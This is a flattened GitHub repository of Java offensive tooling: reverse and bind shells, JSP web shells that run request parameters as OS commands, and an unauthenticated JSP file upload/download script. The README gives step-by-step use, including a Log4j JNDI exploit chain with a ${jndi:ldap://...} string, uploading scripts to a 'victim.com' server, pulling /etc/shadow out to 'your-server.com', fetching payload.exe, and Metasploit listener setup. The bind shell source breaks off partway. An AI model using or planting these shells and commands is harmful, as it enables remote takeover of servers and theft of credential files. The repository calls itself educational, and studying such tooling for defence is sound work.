├── .gitattributes
├── .gitignore
├── LICENSE
├── README.md
├── jar
├── Bind_Shell.jar
└── Reverse_Shell.jar
├── jsp
├── reverse
│ └── jsp_reverse_shell.jsp
└── web
│ ├── files.jsp
│ ├── simple_jsp_web_shell_get.jsp
│ └── simple_jsp_web_shell_post.jsp
├── log4j
├── BindShell.java
└── ReverseShell.java
└── src
├── Bind Shell
├── build.xml
├── manifest.mf
├── nbproject
│ ├── build-impl.xml
│ ├── genfiles.properties
│ ├── project.properties
│ └── project.xml
└── src
│ └── bind
│ └── shell
│ └── BindShell.java
├── Reverse Shell
├── build.xml
├── manifest.mf
├── nbproject
│ ├── build-impl.xml
│ ├── genfiles.properties
│ ├── project.properties
│ └── project.xml
└── src
│ └── reverse
│ └── shell
│ └── ReverseShell.java
└── Web Shell
├── build.xml
├── nbproject
├── ant-deploy.xml
├── build-impl.xml
├── genfiles.properties
├── project.properties
└── project.xml
├── src
└── conf
│ └── MANIFEST.MF
└── web
├── META-INF
└── context.xml
├── WEB-INF
└── web.xml
├── files.jsp
├── index.jsp
├── jsp_reverse_shell.jsp
├── simple_jsp_web_shell_get.jsp
└── simple_jsp_web_shell_post.jsp
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | #NetBeans
2 | **/nbproject/private/
3 | **/nbproject/Makefile-*.mk
4 | **/nbproject/Package-*.bash
5 | build/
6 | nbbuild/
7 | dist/
8 | nbdist/
9 | .nb-gradle/
10 |
11 | # Compiled class file
12 | *.class
13 |
14 | # Log file
15 | *.log
16 |
17 | # BlueJ files
18 | *.ctxt
19 |
20 | # Mobile Tools for Java (J2ME)
21 | .mtj.tmp/
22 |
23 | # Package Files #
24 | *.jar
25 | !/jar/*.jar
26 | *.war
27 | *.nar
28 | *.ear
29 | *.zip
30 | *.tar.gz
31 | *.rar
32 |
33 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
34 | hs_err_pid*
35 |
36 | .gradle
37 | /build/
38 |
39 | # Ignore Gradle GUI config
40 | gradle-app.setting
41 |
42 | # Avoid ignoring Gradle wrapper jar file (.jar files are usually ignored)
43 | !gradle-wrapper.jar
44 |
45 | # Cache of project
46 | .gradletasknamecache
47 |
48 | # # Work around https://youtrack.jetbrains.com/issue/IDEA-116898
49 | # gradle/wrapper/gradle-wrapper.properties
50 | /src/Reverse.Shell/target/
51 |
52 | target/
53 | pom.xml.tag
54 | pom.xml.releaseBackup
55 | pom.xml.versionsBackup
56 | pom.xml.next
57 | release.properties
58 | dependency-reduced-pom.xml
59 | buildNumber.properties
60 | .mvn/timing.properties
61 | .mvn/wrapper/maven-wrapper.jar
62 | /src/Reverse Shell/nbproject/private/
63 | /src/Reverse Shell/build/
64 | /src/Reverse Shell/dist/
65 | /src/Bind Shell/nbproject/private/
66 | /src/Bind Shell/build/
67 | /src/Bind Shell/dist/
68 | /src/Web Shell/nbproject/private/
69 | /src/Web Shell/build/
70 | /src/Web Shell/dist/
71 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2021 Ivan Šincek
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Java Reverse TCP
2 |
3 | JAR, JSP, and Java files for communicating with a remote host.
4 |
5 | The remote host will have full control over the client and all the underlying system commands.
6 |
7 | Works on Linux OS and macOS with `/bin/sh` and Windows OS with `cmd.exe`. The program automatically detects the underlying OS.
8 |
9 | Works with both `ncat` and `multi/handler`.
10 |
11 | Built with JDK v8 on Apache NetBeans IDE v17 (64-bit). All the files require Java SE v8 or greater to run.
12 |
13 | JAR and Java files were tested with Java v8 update 282 on Windows 10 Enterprise OS (64-bit) and Kali Linux v2023.1 (64-bit).
14 |
15 | JSP scripts were tested on Apache Tomcat Version v7.0.100 on XAMPP for Windows v7.4.3 (64-bit).
16 |
17 | Made for educational purposes. I hope it will help!
18 |
19 | ## Table of Contents
20 |
21 | * [JAR Shells](#jar-shells)
22 | * [Log4j Shells](#log4j-shells)
23 | * [JSP Shells](#jsp-shells)
24 | * [JSP Reverse Shell](#jsp-reverse-shell)
25 | * [JSP Web Shells](#jsp-web-shells)
26 | * [JSP File Upload/Download Script](#jsp-file-uploaddownload-script)
27 | * [Case 1: Upload the Script to the Victim’s Server](#case-1-upload-the-script-to-the-victims-server)
28 | * [Case 2: Upload the Script to Your Server](#case-2-upload-the-script-to-your-server)
29 | * [Set Up a Listener](#set-up-a-listener)
30 | * [Runtime](#runtime)
31 |
32 | ## JAR Shells
33 |
34 | Check the source code of JAR files:
35 |
36 | * [/src/Reverse Shell/src/reverse/shell/ReverseShell.java](https://github.com/ivan-sincek/java-reverse-tcp/blob/main/src/Reverse%20Shell/src/reverse/shell/ReverseShell.java)
37 | * [/src/Bind Shell/src/bind/shell/BindShell.java](https://github.com/ivan-sincek/java-reverse-tcp/blob/main/src/Bind%20Shell/src/bind/shell/BindShell.java)
38 |
39 | ---
40 |
41 | Open your preferred console from [/jar/](https://github.com/ivan-sincek/java-reverse-tcp/tree/main/jar) and run the following commands:
42 |
43 | ```fundamental
44 | java -jar Reverse_Shell.jar 192.168.8.185 9000
45 |
46 | java -jar Bind_Shell.jar 9000
47 | ```
48 |
49 | ## Log4j Shells
50 |
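51 | This PoC was tested on Kali Linux v2021.4 (64-bit). It only takes effect against a Log4j 2 release that still resolves JNDI lookups in logged messages, running on a JVM that permits remote LDAP codebases (`com.sun.jndi.ldap.object.trustURLCodebase`, `false` by default on current JDKs); upgrading Log4j or keeping that default blocks this remote class-loading path.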
52 |
53 | **Change the IP address and port number inside the source files as necessary.**
54 |
55 | Open your preferred console from [/log4j/](https://github.com/ivan-sincek/java-reverse-tcp/tree/main/log4j) and run the following commands:
56 |
57 | Compile the source file:
58 |
59 | ```fundamental
60 | javac ReverseShell.java
61 | ```
62 |
63 | Start a local web server from the same directory as the compiled class file (i.e. `ReverseShell.class`):
64 |
65 | ```fundamental
66 | python3 -m http.server 9090
67 |
68 | python3 -m http.server 9090 --directory somedirectory
69 | ```
70 |
71 | Download and build LDAP server:
72 |
73 | ```bash
74 | apt-update && apt-get install maven
75 |
76 | git clone https://github.com/mbechler/marshalsec && cd marshalsec && mvn clean package -DskipTests && cd target
77 | ```
78 |
79 | Start a local LDAP server and create a reference to the compiled class file on your local web server:
80 |
81 | ```fundamental
82 | java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:9090/#ReverseShell
83 | ```
84 |
85 | Credits to the author for [marshalsec](https://github.com/mbechler/marshalsec)!
86 |
87 | Give the local LDAP server a public domain with [ngrok](https://ngrok.com):
88 |
89 | ```fundamental
90 | ./ngrok tcp 1389
91 | ```
92 |
93 | Build the JNDI string (obfuscate it however you like):
94 |
95 | ```fundamental
96 | ${jndi:ldap://x.tcp.ngrok.io:13337/ReverseShell}
97 | ```
98 |
99 | ## JSP Shells
100 |
101 | ### JSP Reverse Shell
102 |
103 | **Change the IP address and port number inside the script as necessary.**
104 |
105 | Copy [/jsp/jsp_reverse_shell.jsp](https://github.com/ivan-sincek/java-reverse-tcp/blob/main/src/Web%20Shell/web/jsp_reverse_shell.jsp) to your project's root directory or upload it to your target's web server.
106 |
107 | Navigate to the file with your preferred web browser.
108 |
109 | ### JSP Web Shells
110 |
111 | Check the [simple JSP web shell](https://github.com/ivan-sincek/java-reverse-tcp/blob/main/src/Web%20Shell/web/simple_jsp_web_shell_post.jsp) based on HTTP POST request.
112 |
113 | Check the [simple JSP web shell](https://github.com/ivan-sincek/java-reverse-tcp/blob/main/src/Web%20Shell/web/simple_jsp_web_shell_get.jsp) based on HTTP GET request. You must [URL encode](https://www.urlencoder.org) your commands.
114 |
115 | ## JSP File Upload/Download Script
116 |
117 | Check the [simple JSP file upload/download script](https://github.com/ivan-sincek/java-reverse-tcp/blob/main/src/Web%20Shell/web/files.jsp) based on HTTP POST request for file upload and HTTP GET request for file download.
118 |
119 | When downloading a file, you should [URL encode](https://www.urlencoder.org) the file path and specify the name of the output file.
120 |
121 | ### Case 1: Upload the Script to the Victim’s Server
122 |
123 | Navigate to the script on the victim's server with your preferred web browser, or use cURL from your PC.
124 |
125 | Upload a file to the victim's server web root directory from your PC:
126 |
127 | ```fundamental
128 | curl -s -k -X POST https://victim.com/files.jsp -F file=@/root/payload.exe
129 | ```
130 |
131 | Download a file from the victim's PC to your PC:
132 |
133 | ```fundamental
134 | curl -s -k -X GET https://victim.com/files.jsp?file=/etc/shadow -o shadow
135 | ```
136 |
137 | If you use reverse shell and you have elevated your initial privileges, this script might not have the same privileges as your shell. To download a certain file, you might need to copy the file to the web root directory and give it necessary read permissions.
138 |
139 | ### Case 2: Upload the Script to Your Server
140 |
141 | From your JSP reverse shell, run the following cURL commands.
142 |
143 | Upload a file from the victim's PC to your server web root directory:
144 |
145 | ```fundamental
146 | curl -s -k -X POST https://your-server.com/files.jsp -F file=@/etc/shadow
147 | ```
148 |
149 | Download a file from your PC to the victim's PC:
150 |
151 | ```fundamental
152 | curl -s -k -X GET https://your-server.com/files.jsp?file=/root/payload.exe -o payload.exe
153 |
154 | curl -s -k -X GET https://your-server.com/payload.exe -o payload.exe
155 | ```
156 |
157 | ## Set Up a Listener
158 |
159 | To set up a listener, open your preferred console on Kali Linux and run one of the examples below.
160 |
161 | Set up `ncat` listener:
162 |
163 | ```fundamental
164 | ncat -nvlp 9000
165 | ```
166 |
167 | Set up `multi/handler` listener:
168 |
169 | ```fundamental
170 | msfconsole -q
171 |
172 | use exploit/multi/handler
173 |
174 | set PAYLOAD windows/shell_reverse_tcp
175 |
176 | set LHOST 192.168.8.185
177 |
178 | set LPORT 9000
179 |
180 | exploit
181 | ```
182 |
183 | ## Runtime
184 |
185 | ```fundamental
186 | ┌──(root💀kali)-[~/Desktop]
187 | └─# ncat -nvlp 9000
188 | Ncat: Version 7.93 ( https://nmap.org/ncat )
189 | Ncat: Listening on :::9000
190 | Ncat: Listening on 0.0.0.0:9000
191 | Ncat: Connection from 192.168.1.117.
192 | Ncat: Connection from 192.168.1.117:49895.
193 | Microsoft Windows [Version 10.0.18363.1556]
194 | (c) 2019 Microsoft Corporation. All rights reserved.
195 |
196 | C:\Users\W10\Desktop\Reverse Shell>whoami
197 | desktop-4kniu10\w10
198 |
199 | C:\Users\W10\Desktop\Reverse Shell>ver
200 |
201 | Microsoft Windows [Version 10.0.18363.1556]
202 |
203 | C:\Users\W10\Desktop\Reverse Shell>
204 | ```
205 |
--------------------------------------------------------------------------------
/jar/Bind_Shell.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ivan-sincek/java-reverse-tcp/3815e5daa227d1aa42f489702cff374adb1517bd/jar/Bind_Shell.jar
--------------------------------------------------------------------------------
/jar/Reverse_Shell.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ivan-sincek/java-reverse-tcp/3815e5daa227d1aa42f489702cff374adb1517bd/jar/Reverse_Shell.jar
--------------------------------------------------------------------------------
/jsp/reverse/jsp_reverse_shell.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.net.SocketTimeoutException"%>
2 | <%@page import="java.util.Arrays"%>
3 | <%@page import="java.net.Socket"%>
4 | <%@page import="java.io.IOException"%>
5 | <%@page import="java.io.OutputStream"%>
6 | <%@page import="java.io.InputStream"%>
7 | <%@page import="java.net.InetSocketAddress"%>
8 |
9 | <%-- Copyright (c) 2021 Ivan Šincek --%>
10 | <%-- v3.0 --%>
11 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
12 | <%-- Works on Linux OS, macOS, and Windows OS. --%>
13 |
14 | <%!
15 | public class ReverseShell { // relays the stdio of a locally started shell process over an outbound TCP connection; entry point is run()
16 | // NOTE(review): seen from the host, this is the servlet container's JVM starting /bin/sh or cmd.exe as a child process while holding an outbound TCP connection.
17 | private InetSocketAddress addr = null; // remote endpoint, built in the constructor
18 | private String os = null; // normalised to "LINUX" or "WINDOWS" by detect()
19 | private String shell = null; // "/bin/sh" or "cmd.exe", chosen by detect()
20 | private byte[] buffer = null; // one relay buffer (1024 bytes, allocated in run()) shared by every brw() call
21 | private int clen = 0; // bytes written to the shell's STDIN that brw() will later drop from its STDOUT (Windows branch only)
22 | private boolean error = false; // set by brw(); ends the relay loop in run()
23 | private String message = null; // last status/error text, read back through getMessage()
24 |
25 | public ReverseShell(String addr, int port) { // only records the endpoint; the connection itself is opened in run()
26 | this.addr = new InetSocketAddress(addr, port);
27 | }
28 | // Chooses the shell from the os.name system property; returns false and sets message when the OS is neither Linux/macOS nor Windows.
29 | private boolean detect() {
30 | boolean detected = true;
31 | this.os = System.getProperty("os.name").toUpperCase();
32 | if (this.os.contains("LINUX") || this.os.contains("MAC")) { // macOS is handled as "LINUX" from here on
33 | this.os = "LINUX";
34 | this.shell = "/bin/sh";
35 | } else if (this.os.contains("WIN")) {
36 | this.os = "WINDOWS";
37 | this.shell = "cmd.exe";
38 | } else {
39 | detected = false;
40 | this.message = "SYS_ERROR: Underlying operating system is not supported, program will now exit...\n";
41 | }
42 | return detected;
43 | }
44 | // Returns the last status/error text, or null when none was recorded.
45 | private String getMessage() {
46 | return this.message;
47 | }
48 | // Copies what is currently readable from input to output through this.buffer; iname/oname are labels ("SOCKET", "STDIN", "STDOUT", "STDERR") that select the special cases below.
49 | // raw bytes are relayed instead of Strings: strings in Java are immutable, so the author avoids them to minimize the data in memory
50 | private void brw(InputStream input, OutputStream output, String iname, String oname) {
51 | int bytes = 0;
52 | try {
53 | do {
54 | if (this.os.equals("WINDOWS") && iname.equals("STDOUT") && this.clen > 0) {
55 | // for some reason Windows OS pipes STDIN into STDOUT
56 | // we do not like that
57 | // we need to discard the data from the stream
58 | do { // reads up to clen bytes (at most one buffer at a time) and does not forward them
59 | bytes = input.read(this.buffer, 0, this.clen >= this.buffer.length ? this.buffer.length : this.clen);
60 | this.clen -= this.clen >= this.buffer.length ? this.buffer.length : this.clen;
61 | } while (bytes > 0 && this.clen > 0);
62 | } else {
63 | bytes = input.read(this.buffer, 0, this.buffer.length);
64 | if (bytes > 0) {
65 | output.write(this.buffer, 0, bytes);
66 | output.flush();
67 | if (this.os.equals("WINDOWS") && oname.equals("STDIN")) {
68 | this.clen += bytes; // remember how many bytes went to the shell so the branch above can drop the same amount
69 | }
70 | } else if (iname.equals("SOCKET")) { // a socket read that returns no bytes is treated as the peer having closed the connection
71 | this.error = true;
72 | this.message = "SOC_ERROR: Shell connection has been terminated\n";
73 | }
74 | }
75 | } while (input.available() > 0);
76 | } catch (SocketTimeoutException ex) {} catch (IOException ex) { // a read timeout (100 ms, set in run()) only means no data yet and is ignored; any other I/O error ends the session
77 | this.error = true;
78 | this.message = String.format("STRM_ERROR: Cannot read from %s or write to %s, program will now exit...\n", iname, oname);
79 | }
80 | }
81 | // Connects to addr, starts the shell, then relays socket and process streams until the shell exits or brw() flags an error; the finally block always releases everything.
82 | public void run() {
83 | if (this.detect()) {
84 | Socket client = null;
85 | OutputStream socin = null;
86 | InputStream socout = null;
87 |
88 | Process process = null;
89 | OutputStream stdin = null;
90 | InputStream stdout = null;
91 | InputStream stderr = null;
92 |
93 | try {
94 | client = new Socket();
95 | client.setSoTimeout(100); // 100 ms read timeout, so the socket read in brw() returns regularly instead of blocking
96 | client.connect(this.addr);
97 | socin = client.getOutputStream();
98 | socout = client.getInputStream();
99 |
100 | this.buffer = new byte[1024];
101 |
102 | process = new ProcessBuilder(this.shell).redirectInput(ProcessBuilder.Redirect.PIPE).redirectOutput(ProcessBuilder.Redirect.PIPE).redirectError(ProcessBuilder.Redirect.PIPE).start(); // child shell with all three standard streams piped to this JVM
103 | stdin = process.getOutputStream();
104 | stdout = process.getInputStream();
105 | stderr = process.getErrorStream();
106 |
107 | do { // single-threaded polling loop: socket to STDIN first, then STDERR and STDOUT back to the socket when they have data
108 | if (!process.isAlive()) {
109 | this.message = "PROC_ERROR: Shell process has been terminated\n"; break;
110 | }
111 | this.brw(socout, stdin, "SOCKET", "STDIN");
112 | if (stderr.available() > 0) { this.brw(stderr, socin, "STDERR", "SOCKET"); }
113 | if (stdout.available() > 0) { this.brw(stdout, socin, "STDOUT", "SOCKET"); }
114 | } while (!this.error);
115 | } catch (IOException ex) {
116 | this.message = String.format("ERROR: %s\n", ex.getMessage());
117 | } finally { // close failures are deliberately ignored so that every remaining resource is still released
118 | if (stdin != null) { try { stdin.close() ; } catch (IOException ex) {} }
119 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} }
120 | if (stderr != null) { try { stderr.close(); } catch (IOException ex) {} }
121 | if (process != null) { process.destroy(); }
122 |
123 | if (socin != null) { try { socin.close() ; } catch (IOException ex) {} }
124 | if (socout != null) { try { socout.close(); } catch (IOException ex) {} }
125 | if (client != null) { try { client.close(); } catch (IOException ex) {} }
126 |
127 | if (this.buffer != null) { Arrays.fill(this.buffer, (byte)0); } // overwrites the relayed bytes still held in the buffer
128 | }
129 | }
130 | }
131 | }
132 | %>
133 |
134 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
135 |
136 | <%
137 | out.print("
");
138 | // change the host address and/or port number as necessary (as shipped: loopback address, port 9000)
139 | ReverseShell sh = new ReverseShell("127.0.0.1", 9000);
140 | sh.run(); // called synchronously: the request thread stays inside run() for the whole session, so the HTTP request to this page remains open until the session ends
141 | if (sh.getMessage() != null) { out.print(sh.getMessage()); } // the status/error text reaches the response body only after run() has returned
142 | sh = null;
143 | System.gc(); // only a suggestion to the JVM; collection is not guaranteed
144 | out.print("
");
145 | %>
146 |
--------------------------------------------------------------------------------
/jsp/web/files.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.nio.file.Files"%>
2 | <%@page import="java.nio.file.Paths"%>
3 | <%@page import="java.io.File"%>
4 | <%@page import="org.apache.tomcat.util.http.fileupload.FileItem"%>
5 | <%@page import="org.apache.tomcat.util.http.fileupload.servlet.ServletRequestContext"%>
6 | <%@page import="org.apache.tomcat.util.http.fileupload.servlet.ServletFileUpload"%>
7 | <%@page import="org.apache.tomcat.util.http.fileupload.disk.DiskFileItemFactory"%>
8 |
9 | <%@page import="java.util.Iterator"%>
10 | <%-- Copyright (c) 2021 Ivan Šincek --%>
11 | <%-- v3.0 --%>
12 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
13 |
14 | <%-- modify the script name and request parameter name to random ones to prevent others form accessing and using your web shell --%>
15 | <%-- don't forget to change the script name in the action attribute --%>
16 | <%-- when downloading a file, you should URL encode the file path --%>
17 |
18 | <%
19 | // your parameter/key here -- the multipart field name (upload) and the query parameter name (download) this page reacts to
20 | String parameter = "file";
21 | String output = "";
22 | if (request.getMethod() == "POST" && request.getContentType() != null && request.getContentType().startsWith("multipart/form-data")) { // upload branch; NOTE(review): nothing in this scriptlet authenticates the caller
23 | Iterator files = new ServletFileUpload(new DiskFileItemFactory()).parseRequest(new ServletRequestContext(request)).iterator();
24 | while (files.hasNext()) {
25 | FileItem file = (FileItem)files.next();
26 | if (file.getFieldName().equals(parameter)) { // parts with any other field name are skipped
27 | try {
28 | output = file.getName();
29 | int pos = output.lastIndexOf(File.separator); // keep only what follows the last platform path separator in the client-supplied name
30 | if (pos >= 0) {
31 | output = output.substring(pos + 1);
32 | }
33 | output = System.getProperty("user.dir") + File.separator + output; // destination is the JVM's working directory (user.dir); it is not taken from the request
34 | file.write(new File(output));
35 | output = String.format("SUCCESS: File was uploaded to '%s'\n", output);
36 | } catch (Exception ex) {
37 | output = String.format("ERROR: %s\n", ex.getMessage());
38 | }
39 | }
40 | file = null;
41 | }
42 | files = null;
43 | }
44 | if (request.getMethod() == "GET" && request.getParameter(parameter) != null && request.getParameter(parameter).trim().length() > 0) { // download branch
45 | try {
46 | output = request.getParameter(parameter).trim(); // NOTE(review): the path comes straight from the query string and is used below without any restriction, so any file the JVM's account can read is returned
47 | response.setHeader("Content-Type", "application/octet-stream");
48 | response.setHeader("Content-Disposition", String.format("attachment; filename=\"%s\"", Paths.get(output).getFileName()));
49 | response.getOutputStream().write(Files.readAllBytes(Paths.get(output))); // the whole file is read into memory before it is written to the response
50 | response.getOutputStream().flush();
51 | response.getOutputStream().close();
52 | } catch (Exception ex) {
53 | output = String.format("ERROR: %s\n", ex.getMessage());
54 | }
55 | }
56 | // if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
57 | // out.print("" + output + "
"); output = null; System.gc();
58 | %>
59 |
60 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
61 |
62 |
63 |
64 |
65 | JSP File Upload/Download
66 |
67 |
68 |
69 |
70 |
74 | <% out.print(output); output = null; System.gc(); %>
75 |
76 |
77 |
--------------------------------------------------------------------------------
/jsp/web/simple_jsp_web_shell_get.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.util.Arrays"%>
2 | <%@page import="java.io.IOException"%>
3 | <%@page import="java.nio.charset.StandardCharsets"%>
4 | <%@page import="java.io.InputStream"%>
5 |
6 | <%-- Copyright (c) 2021 Ivan Šincek --%>
7 | <%-- v3.0 --%>
8 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
9 | <%-- Works on Linux OS, macOS, and Windows OS. --%>
10 |
11 | <%-- modify the script name and request parameter name to random ones to prevent others form accessing and using your web shell --%>
12 | <%-- you must URL encode your commands --%>
13 |
14 | <%
15 | // your parameter/key here -- name of the query parameter whose value is executed below
16 | String parameter = "command";
17 | String output = "";
18 | if (request.getMethod() == "GET" && request.getParameter(parameter) != null && request.getParameter(parameter).trim().length() > 0) { // NOTE(review): the command travels in the query string, so it is recorded wherever request URLs are logged
19 | String os = System.getProperty("os.name").toUpperCase();
20 | String shell = null;
21 | if (os.contains("LINUX") || os.contains("MAC")) {
22 | shell = "/bin/sh -c";
23 | } else if (os.contains("WIN")) {
24 | shell = "cmd.exe /c";
25 | } else {
26 | output = "SYS_ERROR: Underlying operating system is not supported\n";
27 | }
28 | if (shell != null) {
29 | Process process = null;
30 | InputStream stdout = null;
31 | byte[] buffer = null;
32 |
33 | try {
34 | process = Runtime.getRuntime().exec(String.format("%s \"(%s) 2>&1\"", shell, request.getParameter(parameter).trim())); // NOTE(review): the request parameter reaches Runtime.exec unmodified; this call is the command-execution sink that code review or web-shell scanning should flag
35 | stdout = process.getInputStream();
36 | buffer = new byte[1024];
37 |
38 | int bytes = 0;
39 | do { // reads until the child's output stream reports end of data, so the response waits for the command to finish writing
40 | bytes = stdout.read(buffer, 0, buffer.length);
41 | if (bytes > 0) {
42 | output += new String(buffer, 0, bytes, StandardCharsets.UTF_8);
43 | }
44 | } while (bytes > 0);
45 | output = output.replace("<", "<"); // NOTE(review): as shown both arguments are identical, so this is a no-op; presumably the replacement was an HTML entity lost in extraction -- confirm against the original file
46 | output = output.replace(">", ">"); // NOTE(review): same as the line above
47 | } catch (IOException ex) {
48 | output = String.format("ERROR: %s\n", ex);
49 | } finally {
50 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} stdout = null; }
51 | if (process != null) { process.destroy(); process = null; }
52 | if (buffer != null) { Arrays.fill(buffer, (byte)0); buffer = null; } // overwrites the last chunk of command output held in the buffer
53 | }
54 | }
55 | // if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
56 | // out.print("" + output + "
"); output = null; System.gc();
57 | }
58 | %>
59 |
60 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
61 |
62 |
63 |
64 |
65 | Simple JSP Web Shell
66 |
67 |
68 |
69 |
70 | <% out.print(output); output = null; System.gc(); %>
71 |
72 |
73 |
--------------------------------------------------------------------------------
/jsp/web/simple_jsp_web_shell_post.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.util.Arrays"%>
2 | <%@page import="java.io.IOException"%>
3 | <%@page import="java.nio.charset.StandardCharsets"%>
4 | <%@page import="java.io.InputStream"%>
5 |
6 | <%-- Copyright (c) 2021 Ivan Šincek --%>
7 | <%-- v3.0 --%>
8 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
9 | <%-- Works on Linux OS, macOS, and Windows OS. --%>
10 |
11 | <%-- modify the script name and request parameter name to random ones to prevent others form accessing and using your web shell --%>
12 | <%-- don't forget to change the script name in the action attribute --%>
13 |
14 | <%
15 | // your parameter/key here -- name of the form parameter whose value is executed below
16 | String parameter = "command";
17 | String output = "";
18 | if (request.getMethod() == "POST" && request.getParameter(parameter) != null && request.getParameter(parameter).trim().length() > 0) { // NOTE(review): the command travels in the request body, so a log that records only the request line shows just a POST to this page
19 | String os = System.getProperty("os.name").toUpperCase();
20 | String shell = null;
21 | if (os.contains("LINUX") || os.contains("MAC")) {
22 | shell = "/bin/sh -c";
23 | } else if (os.contains("WIN")) {
24 | shell = "cmd.exe /c";
25 | } else {
26 | output = "SYS_ERROR: Underlying operating system is not supported\n";
27 | }
28 | if (shell != null) {
29 | Process process = null;
30 | InputStream stdout = null;
31 | byte[] buffer = null;
32 |
33 | try {
34 | process = Runtime.getRuntime().exec(String.format("%s \"(%s) 2>&1\"", shell, request.getParameter(parameter).trim())); // NOTE(review): the request parameter reaches Runtime.exec unmodified; this call is the command-execution sink that code review or web-shell scanning should flag
35 | stdout = process.getInputStream();
36 | buffer = new byte[1024];
37 |
38 | int bytes = 0;
39 | do { // reads until the child's output stream reports end of data, so the response waits for the command to finish writing
40 | bytes = stdout.read(buffer, 0, buffer.length);
41 | if (bytes > 0) {
42 | output += new String(buffer, 0, bytes, StandardCharsets.UTF_8);
43 | }
44 | } while (bytes > 0);
45 | output = output.replace("<", "<"); // NOTE(review): as shown both arguments are identical, so this is a no-op; presumably the replacement was an HTML entity lost in extraction -- confirm against the original file
46 | output = output.replace(">", ">"); // NOTE(review): same as the line above
47 | } catch (IOException ex) {
48 | output = String.format("ERROR: %s\n", ex);
49 | } finally {
50 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} stdout = null; }
51 | if (process != null) { process.destroy(); process = null; }
52 | if (buffer != null) { Arrays.fill(buffer, (byte)0); buffer = null; } // overwrites the last chunk of command output held in the buffer
53 | }
54 | }
55 | // if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
56 | // out.print("" + output + "
"); output = null; System.gc();
57 | }
58 | %>
59 |
60 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
61 |
62 |
63 |
64 |
65 | Simple JSP Web Shell
66 |
67 |
68 |
69 |
70 |
73 | <% out.print(output); output = null; System.gc(); %>
74 |
75 |
76 |
--------------------------------------------------------------------------------
/log4j/BindShell.java:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2021 Ivan Šincek
2 | // v2.9
3 | // Requires Java SE v8 or greater and JDK v8 or greater.
4 | // Works on Linux OS, macOS, and Windows OS.
5 |
6 | import java.io.IOException;
7 | import java.io.InputStream;
8 | import java.io.OutputStream;
9 | import java.net.ServerSocket;
10 | import java.net.Socket;
11 | import java.net.SocketTimeoutException;
12 | import java.util.Arrays;
13 |
14 | public class BindShell { // listens on a TCP port and relays the stdio of a locally started shell process to the first client that connects
15 | // NOTE(review): there is no main(); the static initialiser at the bottom calls run(), so initialising this class is enough to open the listener.
16 | // change the port number as necessary
17 | private static int port = 9000; // used by new ServerSocket(port) in run(), which binds the wildcard address, i.e. every local interface
18 | private static String os = null; // normalised to "LINUX" or "WINDOWS" by detect()
19 | private static String shell = null; // "/bin/sh" or "cmd.exe", chosen by detect()
20 | private static byte[] buffer = null; // one relay buffer (1024 bytes, allocated in run()) shared by every brw() call
21 | private static int clen = 0; // bytes written to the shell's STDIN that brw() will later drop from its STDOUT (Windows branch only)
22 | private static boolean error = false; // set by brw(); ends the relay loop in run()
23 | // Chooses the shell from the os.name system property; returns false and prints SYS_ERROR when the OS is neither Linux/macOS nor Windows.
24 | private static boolean detect() {
25 | boolean detected = true;
26 | os = System.getProperty("os.name").toUpperCase();
27 | if (os.contains("LINUX") || os.contains("MAC")) { // macOS is handled as "LINUX" from here on
28 | os = "LINUX";
29 | shell = "/bin/sh";
30 | } else if (os.contains("WIN")) {
31 | os = "WINDOWS";
32 | shell = "cmd.exe";
33 | } else {
34 | detected = false;
35 | System.out.print("SYS_ERROR: Underlying operating system is not supported, program will now exit...\n");
36 | }
37 | return detected;
38 | }
39 | // Copies what is currently readable from input to output through buffer; iname/oname are labels ("SOCKET", "STDIN", "STDOUT", "STDERR") that select the special cases below.
40 | // raw bytes are relayed instead of Strings: strings in Java are immutable, so the author avoids them to minimize the data in memory
